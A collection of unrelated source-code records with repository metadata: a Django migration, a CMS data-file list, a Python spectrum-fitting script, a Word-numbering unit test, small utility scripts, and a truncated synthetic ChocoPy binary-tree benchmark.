3a0aa4f6f46d50f9055d2000d1b39488f5c19f87 | b341a8d120737297aa8fd394a23633dac9b5ccda | /accounts/migrations/0007_auto_20210122_1129.py | c7476e71ff6f0746f30db617c468bd59bbe23d1c | [] | no_license | Minari766/disney_side_stories | 16d97cb02bf00aa5439d59f753abb9a4706a30aa | aa2d88b1b0fdd87a27f41318bd3ec7352229b6ff | refs/heads/main | 2023-08-15T07:03:16.922579 | 2021-10-03T07:47:22 | 2021-10-03T07:47:22 | 306,496,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | # Generated by Django 2.2 on 2021-01-22 02:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0006_auto_20210122_0127'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='icon',
field=models.ImageField(blank=True, null=True, upload_to='images', verbose_name='アイコン'),
),
]
| [
"mina3.ryu0728@gmail.com"
] | mina3.ryu0728@gmail.com |
941accb672f76b0db53c6f3a669fcfd3f017badb | 227438026ddb81cb13d174fab2f0c492da6c5975 | /python/MuonGunPt50_FullEta_FullPhi_SmallSigmaZ_cfi.py | a59e85f89d64eceb435409fc4a3a149a836cac4e | [] | no_license | skaplanhex/cms-PLTSimulation | 4c360a56335c673e8c703ea70371e58a1aeff60c | 250e324eb3ea83c965dcb0bab47a53b399cf7625 | refs/heads/master | 2021-01-01T15:17:15.047788 | 2014-10-22T00:11:07 | 2014-10-22T00:11:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,016 | py | import FWCore.ParameterSet.Config as cms
source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_100_1_NnM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_10_1_fLF.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_11_1_aaa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_12_1_4PY.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_13_1_Tuz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_14_1_6RT.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_15_1_9k4.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_16_1_wr8.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_17_1_rU2.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_18_1_nSq.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_19_1_Gjz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_1_1_lOE.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_20_1_Mfl.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_21_1_tfb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_22_1_wlo.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_23_1_c2x.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_24_1_oLd.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_25_1_qSB.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_26_1_vVz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_27_1_iD8.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_28_1_Tpx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_29_1_Fhe.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_2_1_nj1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_30_1_VMa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_31_1_fve.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_32_1_wwI.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_33_1_xSu.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_34_1_aSb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_35_1_LTi.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_36_1_hPX.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_37_1_gLE.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_38_1_6dM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_39_1_890.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_3_1_Dwx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_40_1_6gM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_41_1_cRm.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_42_1_l0n.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_43_1_9zp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_44_1_CEr.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_45_1_SG4.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_46_1_jM1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_47_1_G1x.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_48_1_rHg.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_49_1_9Ex.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_4_1_nbS.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_50_1_rhf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_51_1_pVw.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_52_1_CNa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_53_1_2FH.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_54_1_lzt.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_55_1_aJy.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_56_1_tKI.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_57_1_WQ1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_58_1_Kyp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_59_1_eUR.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_5_1_SQM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_60_1_BDu.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_61_1_xhw.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_62_1_22q.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_63_1_QTZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_64_1_djT.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_65_1_krx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_66_1_RVf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_67_1_bNe.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_68_1_HOD.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_69_1_rRx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_6_1_trm.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_70_1_k2l.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_71_1_DFG.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_72_1_5LM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_73_1_QdN.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_74_1_Fwv.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_75_1_8Xf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_76_1_fiA.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_77_1_1Wb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_78_1_oGC.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_79_1_BAa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_7_1_WWX.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_80_1_0gY.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_81_1_gIc.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_82_1_akZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_83_1_TZD.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_84_1_D3p.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_85_1_AM5.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_86_1_TnA.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_87_1_lvl.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_88_1_Tv0.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_89_1_G0q.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_8_1_IJR.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_90_1_NTZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_91_1_7CQ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_92_1_bPW.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_93_1_pg2.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_94_1_b1K.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_95_1_qJs.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_96_1_BkG.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_97_1_tGZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_98_1_Kof.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_99_1_eMp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_9_1_fKI.root',
)
)
| [
"skaplan@physics.rutgers.edu"
] | skaplan@physics.rutgers.edu |
c2db7ee03c0e494e5769a87dc71cf5ff86c7c6db | 53898c500373b0cb338dd2d1e5e7b2e4fa90e64e | /MigrateDaoExamole/Class/model/Client.py | d0f80be8f3048bf683916d5e8304d8de3bc4a448 | [] | no_license | CGVLobo/Python | 6026f99a8c58a80e0cc890478016ac1e4aeb1ba5 | 6dd57016dcb9ab62836a2aebb4e3201238a194fb | refs/heads/master | 2021-08-28T10:31:48.390904 | 2021-08-23T23:54:13 | 2021-08-23T23:54:13 | 238,586,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | class Client:
def __init__(self,name,age):
self.name=name
self.age=age
def setId(self,id):
self.id=id
def toDict(self):
return self.__dict__
def toString(self):
return "name="+self.name+" age="+str(self.age)+" id="+str(self.id) | [
"noreply@github.com"
] | noreply@github.com |
2d430f2574987f6486384f1b770dec90e0908c69 | 5486c1f077634cf7ecbc69a05c2ac78d3ef86770 | /parte1.py | 9288241ecaf20dd129f268085ed4dc812dcbdd0e | [
"MIT"
] | permissive | LeonardoLeiva/10Tarea | 93d76bf3e4a573bec58ada49ef60bfb0e29baa60 | 624f9d7cf2d2252482c7f3e8ef27dea7e52b0bd9 | refs/heads/master | 2020-12-28T19:46:13.856262 | 2015-12-02T03:34:26 | 2015-12-02T03:34:26 | 47,144,826 | 0 | 0 | null | 2015-11-30T20:43:25 | 2015-11-30T20:43:24 | null | UTF-8 | Python | false | false | 2,530 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
este codigo busca modelar un espectro experimental
'''
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats
from scipy.optimize import leastsq
from scipy import optimize as opt
# funciones estructurales
def leer_archivo(nombre):
'''
lee el archivo
nombre debe ser un str
'''
datos = np.loadtxt(nombre)
return datos
def modelo_gauss(p, x):
a, b, A, mu, sigma = p
y1 = a * x + b
y2 = y = A * scipy.stats.norm(loc=mu, scale=sigma).pdf(x)
return y1 - y2
def modelo_lorentz(p, x):
a, b, A, mu, sigma = p
y1 = a * x + b
y2 = A * scipy.stats.cauchy(loc=mu, scale=sigma).pdf(x)
return y1 - y2
def plot(x, y, y1, y2):
'''
grafica los modelos comparandolos (por separado) con los datos exp
'''
fig = plt.figure()
fig.clf()
ax1 = fig.add_subplot(111)
ax1.plot(x, y, '+', label="Espectro Experimental")
ax1.plot(x, y1, '-', label="Ajuste Gaussiano")
ax1.plot()
ax1.set_xlabel("Longitud de Onda [$\AA$]")
ax1.set_ylabel("Frecuencia [$erg s^{-1} Hz^{-1} cm^{-2}$]")
plt.legend(loc=4)
plt.savefig("gauss.png")
fig.clf()
ax2 = fig.add_subplot(111)
ax2.plot(x, y, '+', label="Espectro Experimental")
ax2.plot(x, y2, '-', label="Ajuste Lorentz")
ax2.plot()
ax2.set_xlabel("Longitud de Onda [$\AA$]")
ax2.set_ylabel("Frecuencia [$erg s^{-1} Hz^{-1} cm^{-2}$]")
plt.legend(loc=4)
plt.savefig("lorentz.png")
plt.draw()
plt.show()
def experimental():
'''
no es muy necesaria, pero se deja para tener mas orden
'''
ex = leer_archivo("espectro.dat")
x_ex = ex[:, 0]
y_ex = ex[:, 1]
return x_ex, y_ex
def residuo_gauss(p, x_exp, y_exp):
err = y_exp - modelo_gauss(p, x_exp)
return err
def residuo_lorentz(p, x_exp, y_exp):
err = y_exp - modelo_lorentz(p, x_exp)
return err
def chi_cuadrado(p, x, y, f):
S = np.sum((y - f(p, x)) ** 2)
return S
# inicializacion
p0 = 1e-16, 0, 1e-16, 6550, 1
x_exp, y_exp = experimental()
aprox_1 = leastsq(residuo_gauss, p0, args=(x_exp, y_exp))
aprox_2 = leastsq(residuo_lorentz, p0, args=(x_exp, y_exp))
# plot
p_gauss = aprox_1[0]
p_lorentz = aprox_2[0]
y1 = modelo_gauss(p_gauss, x_exp)
y2 = modelo_lorentz(p_lorentz, x_exp)
plot(x_exp, y_exp, y1, y2)
print p_gauss
print p_lorentz
print chi_cuadrado(p_gauss, x_exp, y_exp, modelo_gauss)
print chi_cuadrado(p_lorentz, x_exp, y_exp, modelo_gauss)
| [
"leonardo_conan@hotmail.com"
] | leonardo_conan@hotmail.com |
436645c364f840999119d1e57184125dbceeca14 | 1f006f0c7871fcde10986c4f5cec916f545afc9f | /apps/ice/plugins/oxml/oxml_wordNumbering_test.py | 9d73299a89601ac0dd3e3d023fcdc93ea3e7a208 | [] | no_license | ptsefton/integrated-content-environment | 248b8cd29b29e8989ec1a154dd373814742a38c1 | c1d6b5a1bea3df4dde10cb582fb0da361dd747bc | refs/heads/master | 2021-01-10T04:46:09.319989 | 2011-05-05T01:42:52 | 2011-05-05T01:42:52 | 36,273,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,070 | py | #!/usr/bin/env python
#
# Copyright (C) 2010 Distance and e-Learning Centre,
# University of Southern Queensland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
from unittest import TestCase
import sys
from oxml_wordNumbering import WordNumbering
testFile = "testData/numbering.xml"
class WordNumberingTest(TestCase):
def setUp(self):
f = open(testFile, "rb")
self.wordNumberingXmlStr = f.read()
f.close()
def tearDown(self):
pass
def testGetNumLevelInfo(self):
#word/numbering.xml
wordNum = WordNumbering(self.wordNumberingXmlStr)
numId = "1"
level = "0"
info = wordNum.getNumLevelInfo(numId, level)
expected = {'leftIndent': u'720', 'start': u'1', 'jc': u'left',
'text': u'%1.', 'format': u'decimal'}
self.assertEquals(info, expected)
def runUnitTests(locals):
print "\n\n\n\n"
if sys.platform=="cli":
import clr
import System.Console
System.Console.Clear()
print "---- Testing under IronPython ----"
else:
print "---- Testing ----"
# Run only the selected tests
args = list(sys.argv)
sys.argv = sys.argv[:1]
args.pop(0)
runTests = args
runTests = [ i.lower().strip(", ") for i in runTests]
runTests = ["test"+i for i in runTests if not i.startswith("test")] + \
[i for i in runTests if i.startswith("test")]
if runTests!=[]:
testClasses = [i for i in locals.values() \
if hasattr(i, "__bases__") and \
(TestCase in i.__bases__)]
testing = []
for x in testClasses:
l = dir(x)
l = [ i for i in l if i.startswith("test") and callable(getattr(x, i))]
for i in l:
if i.lower() not in runTests:
delattr(x, i)
else:
testing.append(i)
x = None
num = len(testing)
if num<1:
print "No selected tests found! - %s" % str(args)[1:-1]
elif num==1:
print "Running selected test - %s" % (str(testing)[1:-1])
else:
print "Running %s selected tests - %s" % (num, str(testing)[1:-1])
from unittest import main
main()
if __name__=="__main__":
runUnitTests(locals())
sys.exit(0)
| [
"raward@gmail.com@110e3293-9ef9-cb8f-f479-66bdb1942d05"
] | raward@gmail.com@110e3293-9ef9-cb8f-f479-66bdb1942d05 |
4cead54d458cb2804b14a4b098d1ed1d48940e63 | f6fd53b95498b7a3c33c9726982db1c52f7f208f | /binary_to_decimal.py | e7bc657cd2b46270d061344f03ab2ea3b970dfb3 | [] | no_license | AEC-Tech/Python-Programming | aed84cc40e6c5a9b4035d251c47585d6d8a5dbfb | fb2dcd766b1e2cca6c712fdbdff72f5d50ee93b1 | refs/heads/master | 2022-08-11T13:17:03.618471 | 2022-07-25T12:26:30 | 2022-07-25T12:26:30 | 127,695,508 | 23 | 22 | null | 2020-10-04T18:14:02 | 2018-04-02T03:01:56 | Jupyter Notebook | UTF-8 | Python | false | false | 145 | py | binary = input("Enter the binay number : ")
s = 0
n = len(binary) - 1
for d in binary:
s += int(d) * 2 ** n
n -= 1
print("Decimal is ",s) | [
"noreply@github.com"
] | noreply@github.com |
3ec22fdc103cb902979ce4613a9130c89dd06f66 | 256f5e959d2afa3416cbc97609dbf4e3ed2d08a0 | /visual_helper.py | 34a61643b41f07fd8d183fdaec4b583b0c01e3e0 | [] | no_license | ferhatmelih/gittutorial | 692280aaf8365bd97d777b5e3428a7fb1b1346c3 | 7e9a06d845b3e5d8c67cbba958d6bdc329e224d1 | refs/heads/master | 2020-08-06T13:20:06.851039 | 2019-10-05T13:38:03 | 2019-10-05T13:38:03 | 212,990,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30 | py | asdas
def function():
pass | [
"melih.dal@eatron.com"
] | melih.dal@eatron.com |
05bafd9cd33150e356ee71cf5ec0c6d471a8fd8c | c6bd7a1a9d5b027f4ccb04228d30889058ed1186 | /MPH_conversion.py | 228529cc770bf0962d10abd9da1adf36c2e0d69a | [] | no_license | lukefrasera/unr_internship_project_01 | 421fdb50739e6299a23afe5d5ad0d7aec9260b36 | be82b67e8f78344da30cfd148a645538890bb5e9 | refs/heads/master | 2022-06-17T01:46:12.014121 | 2015-10-02T22:19:23 | 2015-10-02T22:19:23 | 261,266,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py | #!/usr/bin/env python
def main():
pass | [
"mirandakcross@gmail.com"
] | mirandakcross@gmail.com |
5adfbabc3629b9b8f698444d0bc44b08d4c24358 | ffcc9a3c8480b436df89063be1cbb4947b04ed40 | /guide/lesson3.py | 61706413801349822f497343f776184d915dde9c | [
"MIT"
] | permissive | TeaPackCZ/heidi | d37bd97708f0f5d3a3930ed01a3b0f4fc4411747 | 44c5fa7442e225aed6978a0decbdbcea3b33837e | refs/heads/master | 2021-01-17T04:51:27.257075 | 2015-06-09T04:00:45 | 2015-06-09T04:00:45 | 33,980,451 | 0 | 1 | null | 2015-04-15T07:49:13 | 2015-04-15T07:49:12 | null | UTF-8 | Python | false | false | 521 | py | """
Lesson 3 - logging examples
"""
import sys
sys.path.append('..') # access to drone source without installation
from ardrone2 import ARDrone2, ManualControlException
def testLesson3( drone ):
try:
drone.takeoff()
drone.hover(10.0)
except ManualControlException, e:
print "ManualControlException"
drone.land()
print "Battery", drone.battery
if __name__ == "__main__":
import launcher
launcher.launch( sys.argv, ARDrone2, testLesson3 )
# vim: expandtab sw=4 ts=4
| [
"martind@mapfactor.com"
] | martind@mapfactor.com |
e6eeb16088bc7aa7f078ef1eff1925877e565e54 | 54e5d550eeb7664f8426cb2429a443680b70f890 | /CH06/Whileture.py | 304526403a9da8ac67690ad6d43b368e8fd480e9 | [] | no_license | Choiseokjoon/HelloPython | c2cb53a0b2c98f01cd6aa9fc6cd712a420d6b39e | da9ad39bb5dc31c99718f1b009c7ef845cc0a964 | refs/heads/master | 2020-05-15T17:30:34.585815 | 2019-04-20T13:01:31 | 2019-04-20T13:01:31 | 182,406,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | sum_all = 0
num = 0
while True:
print("1")
if sum_all >=50 :
break
sum_all = sum_all +num
num = num + 1
| [
"noreply@github.com"
] | noreply@github.com |
199d434465c3656aee4f794b9c3e45082973e134 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-7896.py | b9db85cffe8ae7ce8835bf3307e75b65eb9792ec | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,291 | py | # Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
